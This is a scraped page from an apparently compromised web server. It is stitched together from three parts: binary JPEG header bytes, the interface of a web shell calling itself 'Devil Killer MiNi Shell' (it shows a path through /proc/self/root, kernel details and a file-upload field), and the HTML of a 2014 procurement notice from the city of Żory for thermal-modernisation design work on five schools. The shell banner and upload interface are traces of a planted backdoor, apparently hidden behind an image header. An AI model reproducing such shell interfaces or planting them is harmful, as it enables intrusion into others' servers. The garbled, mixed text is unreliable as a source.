JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140918/199343-N-2014.html

<p class="kh_header"><b>Żory: Opracowanie dokumentacji projektowej termomodernizacji obiektów oświatowych 
dofinansowanych z programu operacyjnego PL04 w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014.</b><br>
<b>Numer ogłoszenia: 199343 - 2014; data zamieszczenia: 18.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej termomodernizacji obiektów oświatowych 
dofinansowanych z programu operacyjnego PL04 w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Opracowanie dokumentacji projektowej termomodernizacji obiektów oświatowych 
dofinansowanych z programu operacyjnego PL04 w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014.

Zamówienie zostało podzielone na 5 części:

Część 1. Opracowanie dokumentacji projektowej termomodernizacji Zespołu Szkół nr 5 ul. Wodzisławska 201.
Część 2. Opracowanie dokumentacji projektowej termomodernizacji Zespołu Szkół nr 2 ul.  Boryńska  2
Część 3. Opracowanie dokumentacji projektowej termomodernizacji Centrum Kształcenia Zawodowego i Ustawicznego os. Księcia Władysława.
Część 4. Opracowanie dokumentacji projektowej termomodernizacji Zespołu Szkół Specjalnych os. Pawlikowskiego.
Część 5. Opracowanie dokumentacji projektowej termomodernizacji Szkoły Podstawowej nr 3 os. 700-lecia

Zamawiający dopuszcza możliwość składania ofert częściowych.

Opis przedmiotu zamówienia

I. Zakres prac projektowych:
1.Dokumentacja projektowa powinna zawierać:
a)projekty budowlane wykonawcze  dla poszczególnych branż,
b)informację BIOZ,
c)przedmiary robót i kosztorysy inwestorskie (z podziałem na poszczególne branże),  z rozdziałem na koszty kwalifikowane i koszty niekwalifikowane (zgodnie z wnioskiem aplikacyjnym dla programu operacyjnego PL04, audytem efektywności ekologicznej oraz z wytycznymi zawartymi na stronie internetowej Narodowego Funduszu Ochrony Środowiska (nabór PL04 2013)
d) specyfikacje techniczne wykonania i odbioru robót (z podziałem na poszczególne branże),
e)ocenę stanu technicznego istniejących budynków oświatowych.


2.Wymogi dotyczące kompletności dokumentacji projektowej.
a)dokumentację projektową należy opracować w 4 egz. w formie papierowej,
b)specyfikacje techniczne, BIOZ, przedmiary robót i kosztorysy inwestorskie w 1 egz. w formie papierowej, 
c)dodatkowo całość opracować w wersji elektronicznej  w formacie pdf oraz w formatach edytowalnych.

II.Ogólne wytyczne dotyczące wykonania dokumentacji projektowej:
1.Wykonać inwentaryzację budowlaną obiektów w zakresie niezbędnym do opracowania dokumentacji projektowej.
2.Projekty należy opracować na aktualnych mapach (w przypadku konieczności rozbudowy- na mapach do celów projektowych).
3.Uzyskać niezbędne decyzje administracyjne w tym między innymi pozwolenia na budowę,
4.Projekty opracować zgodnie z aktualnie obowiązującymi przepisami, normami 
i rozporządzeniami (z uwzględnieniem zmian w Warunkach Technicznych  Wykonania  i Odbioru Robót Budowlanych  obowiązujących od  01 stycznia 2014 roku) oraz szczegółowymi przepisami w zakresie ochrony przeciwpożarowej. 
5.Dokumentacje projektowe  należy uzgodnić z: 
-Zamawiającym,
-rzeczoznawcą ds. zabezpieczeń  przeciwpożarowych  (w  zakresie dostosowania istniejącego budynku Zespołu Szkół Nr 5 do aktualnych przepisów ochrony  przeciwpożarowej oraz Zespołu Szkół Specjalnych - w zakresie likwidacji schodów ewakuacyjnych),
-dyrektorami poszczególnych placówek oświatowych,
6.Obowiązki projektanta:
-nadzór autorski nad realizacją obiektu,
-udział w naradach koordynacyjnych ( na wezwanie Zamawiającego) oraz w trakcie czynności odbioru końcowego,
-udzielanie odpowiedzi na pytania zadane przez wykonawców ubiegających się o udzielenie zamówienia w postępowaniu przetargowym na realizację zaprojektowanej inwestycji, a dotyczące rozwiązań projektowych, przedmiaru robót i specyfikacji technicznej wykonania i odbioru robót, w terminie wskazanym przez Zamawiającego
7.W projektach należy uwzględnić:
-wytyczne zapisów wniosku aplikacyjnego dla programu operacyjnego PL04  i audytu efektywności ekologicznej ( zgodnie z załącznikiem  nr 1).
-prace wynikające z ekspertyzy ornitologicznej i chiropterologicznej w zakresie 
wykonania i umiejscowienia budek lęgowych dla ptaków i nietoperzy (zgodnie z załącznikiem nr 2).
8.W początkowej fazie prac projektowych Wykonawca jest zobowiązany 
do opracowania i przedstawienia do akceptacji Zamawiającego trzech koncepcji kolorystyki elewacji.
9.Informacje dodatkowe:
-dostosowanie kolorystyki okien do istniejących, niepodlegających wymianie,
-uwzględnienie wymiany rynien, parapetów zewnętrznych i wewnętrznych, przełożenie rolet, klimatyzatorów i innych urządzeń i elementów zawieszonych na elewacji budynków oraz znajdujących się na docieplanych dachach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część 1. Kwota: 1.000 zł
Część 2. Kwota: 500 zł
Część 3. Kwota: 1.000 zł
Część 4. Kwota: 1.000 zł
Część 5. Kwota: 1.000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wskaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za: 
a)	projektowanie w specjalności instalacji elektrycznych (uprawnienia w zakresie projektowania),
b)	projektowanie w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych (uprawnienia w zakresie projektowania), 
c)	projektowanie w specjalności konstrukcyjno-budowlanej (uprawnienia w zakresie projektowania), 

wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.

Wykonawca oświadczy, że osoby(a), które będą uczestniczyć w wykonywaniu zamówienia posiadają(a) wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

Zamawiający dopuszcza łączenie funkcji ww. osób pod warunkiem posiadania wymaganych uprawnień.

W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2003 r. Nr 207, poz. 2016 ze zmianami).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia lub inny dokument potwierdzający ten fakt .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Przyczyna/okoliczności    
Zmiana przepisów o podatku od towarów i usług
Skutek - zmiana w umowie/aneks
zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT

II. Przyczyna/okoliczności  
Zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia                                
Skutek - zmiana w umowie/aneks
Zmiana umowy w zakresie wynikającym z nowo obowiązujących przepisów

III. Przyczyna/okoliczności                                         
Zmiany w umowach, porozumieniach, wytycznych pomiędzy Zamawiającym a inną niż Wykonawca stroną 
Skutek - zmiana w umowie/aneks
Dostosowanie treści umowy do wprowadzonych zmian

IV. Przyczyna/okoliczności                                         
Zmiana lub rezygnacja z podwykonawcy będącego podmiotem na zasobach którego opierał się wykonawca w celu spełnienia warunków udziału w postępowaniu na zasadach art. 26 ust. 2b 
Skutek - zmiana w umowie/aneks
Wprowadzenie (Podwykonawca lub Wykonawca) innego podmiotu który potwierdza spełnienie warunków w stopniu nie mniejszym niż wymagany w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zory.pl  Menu przedmiotowe: Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Al. W.P. 25, 44-240 Żory, pok. 203 IIp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2014 godzina 12:00, miejsce: Urząd Miasta Żory, Al. W.P. 25, 44-240 Żory, pok. INFORMACJA - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej termomodernizacji Zespołu Szkół nr 5 ul. Wodzisławska 201..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1. Opracowanie dokumentacji projektowej termomodernizacji Zespołu Szkół nr 5 ul. Wodzisławska 201
1. Prace przygotowawcze - organizacja placu budowy,
2. Branża budowlana
A.termomodernizacja istniejącego budynku szkoły (na podstawie wniosku aplikacyjnego dla programu operacyjnego PL04 i audytu efektywności ekologicznej) - obejmująca między innymi:
a)prace właściwe związane z termomodernizacją obiektów a zwłaszcza:
-wymiana okien zewnętrznych,
-wymiana drzwi zewnętrznych,
-ocieplenie ścian zewnętrznych Gimnazjum,
-ocieplenie ścian piwnic przy gruncie,
-ocieplenie ścian zewnętrznych piwnic,
-ocieplenie stropodachu nad budynkiem Szkoły Podstawowej,
b)prace towarzyszące: 
-ustawienie rusztowań, 
-malowanie ścian zewnętrznych budynku Szkoły Podstawowej oraz budynku sali gimnastycznej z dostosowaniem kolorystyki do całości obiektów Zespołu Szkół i nowo budowanego Przedszkola - zgodnie z załączoną wizualizacją,
-wymiana instalacji odgromowej (nowe przewody poprowadzone na ścianach pod styropianem w rurkach niepalnych z dostępną puszką złącza kontrolnego),  
-wykończenie  cokołu budynku, 
-wymiana obróbek blacharskich oraz rynien i rur spustowych,
-demontaż oraz montaż po wykonaniu ocieplenia elementów znajdujących się na elewacji np.: tablice informacyjne, kamery monitoringu, oprawy oświetleniowe, wyłączniki, daszki, kratki wentylacyjne itp. ( w przypadku zniszczonych elementów lub niepasujących kolorystycznie do projektowanej elewacji należy zaprojektować nowe), 
-remont pokrycia dachu ( w przypadku jeśli dach nie będzie ocieplony za pomocą styropapy),
-wykonanie opaski wokół budynku,
-remont schodów zewnętrznych.

B.dostosowania istniejącego budynku szkoły do aktualnych przepisów ochrony przeciwpożarowej (z uwzględnieniem wykonywanej aktualnie rozbudowy budynku o część przedszkolną) - w oparciu o Opinię z zakresu ochrony przeciwpożarowej opracowanej przez rzeczoznawcę ds. zabezpieczeń  przeciwpożarowych mgr inż. Kamila Kwoska  ( zgodnie z   załącznikiem  nr 3).

3. Branża elektryczna
Projekt budowlano - wykonawczy ma uwzględniać zapisy wniosku aplikacyjnego dla programu operacyjnego PL04 i audytu efektywności ekologicznej.
Zakres projektu:
a)instalacja oświetlenia w zakresie wymiany 347 istniejących pkt. świetlnych na energooszczędne świetlówki przy założeniu redukcji zapotrzebowania na energię elektryczną z 51145 kWh/rok dla istniejącego oświetlenia na 35452,7 kWh/rok dla oświetlenia energooszczędnego,
b)wymiana oprzewodowania, zabezpieczenia prądowego i sterowania instalacją oświetleniową oraz roboty związane z naprawą tynków i malowaniem po robotach elektrycznych ,
c)wymiana instalacji odgromowej - należy uwzględnić prace termomodernizacyjne,
d)inwentaryzacja obiektu do celów projektowych,
e)dostosowanie obiektu do wymogów ochrony ppoż. w tym dostosowanie istniejącego wyłącznika pożarowego prądu do obecnie obowiązujących przepisów,

4. Branża sanitarna
Zakres projektu:
a)inwentaryzacja instalacji c.o.
b)instalacja c.o. - określenie nastawy zaworów termostatycznych 
wraz z niezbędnymi obliczeniami,
c)kotłownia gazowa wraz ze schematem technologicznym,
d)układ odprowadzenia spalin,
e)układ przygotowania c. w. u. wraz z instalacją,
f)wentylacja budynku szkoły,
g)projekt wewnętrznej instalacji hydrantowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej termomodernizacji Zespołu Szkół nr 2 
ul.  Boryńska  2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace przygotowawcze - organizacja placu budowy
2. Branża budowlana
Termomodernizacja istniejącego budynku szkoły (na podstawie wniosku aplikacyjnego dla programu operacyjnego PL04 i audytu efektywności ekologicznej) - obejmująca między innymi:
a)	prace właściwe związane z termomodernizacją obiektów a zwłaszcza:
-wymiana luksferów na okna,
-wymiana drzwi zewnętrznych,
-zamurowanie luksferów,
-ocieplenie ścian zewnętrznych z wyrównaniem powierzchni falistej ścian, oraz z dopasowaniem kolorystyki elewacji do  kolorystyki sąsiedniego budynku basenu,
-ocieplenie stropodachów,
-ocieplenie ścian piwnic przy gruncie,
b)	 prace towarzyszące: 
-montaż i praca  rusztowań, 
-malowanie ścian zewnętrznych  budynku Sali Gimnastycznej z dostosowaniem 
kolorystyki do całości obiektów Zespołu Szkół Nr2.
-wymiana instalacji odgromowej,(nowe przewody poprowadzone na ścianach pod styropianem w rurkach niepalnych z dostępną puszką złącza kontrolnego),
-wykończenie  cokołu budynku,
-wymiana obróbek blacharskich, oraz rynien i rur spustowych,
-demontaż oraz montaż (po wykonaniu ocieplenia) elementów znajdujących się na elewacjach np.: tablice informacyjne, kamery monitoringu, oprawy oświetleniowe, wyłączniki, daszki, kratki wentylacyjne, rolety zewnętrzne okienne itp. (w przypadku zniszczonych bądź  niepasujących kolorystycznie elementów-należy zaprojektować nowe),
-demontaż oraz montaż po wykonaniu ocieplenia połaci dachu , elementów typu 
wsporniki instalacji odgromowej, wentylatory, maszty antenowe itp. (w   
przypadku znacznego zużycia tych elementów-należy zaprojektować nowe),
-remont pokrycia dachu (w przypadku jeśli dach nie będzie ocieplony za pomocą styropapy ),
-wykonanie opaski wokół budynku,
-remont schodów zewnętrznych,

3. Branża elektryczna
Projekt budowlano - wykonawczy ma uwzględniać zapisy wniosku aplikacyjnego dla programu operacyjnego PL04 i audytu efektywności ekologicznej.
Zakres projektu:
a)	instalacja oświetlenia w zakresie wymiany 500 istniejących pkt. świetlnych na energooszczędne świetlówki przy założeniu redukcji zapotrzebowania na energię elektryczną z 110894,7 kWh/rok dla istniejącego oświetlenia na 88862,7 kWh na rok dla oświetlenia energooszczędnego,
b)	wymiana oprzewodowania, zabezpieczenia prądowego i sterowania instalacją oświetleniową oraz roboty związane z naprawą tynków i malowaniem po robotach elektrycznych,
c)	wymiana instalacji odgromowej - należy uwzględnić prace termomodernizacyjne.

4. Branża sanitarna
Zakres projektu:
a)	wentylacja budynku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej termomodernizacji Centrum Kształcenia Zawodowego i Ustawicznego os. Księcia Władysława..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace przygotowawcze - organizacja placu budowy
2. Branża budowlana
Termomodernizacja istniejącego budynku szkoły (na podstawie wniosku i audytu efektywności ekologicznej) -obejmująca między innymi:
a)	prace właściwe związane z termomodernizacją obiektów a zwłaszcza:
-wymiana okien zewnętrznych,
-wymiana drzwi zewnętrznych,
-ocieplenie ścian zewnętrznych z wyrównaniem powierzchni falistej ścian, oraz z demontażem blachy trapezowej z elewacji szczytowej Sali Gimnastycznej,
-ocieplenie stropodachów,
-ocieplenie ścian piwnic przy gruncie,
b)	 prace towarzyszące: 
-montaż i praca  rusztowań, 
-wymiana instalacji odgromowej,(nowe przewody poprowadzone na ścianach pod  styropianem w rurkach niepalnych z dostępną puszką złącza kontrolnego),
-wykończenie  cokołu budynku, 
-wymiana obróbek blacharskich, oraz rynien i rur spustowych,
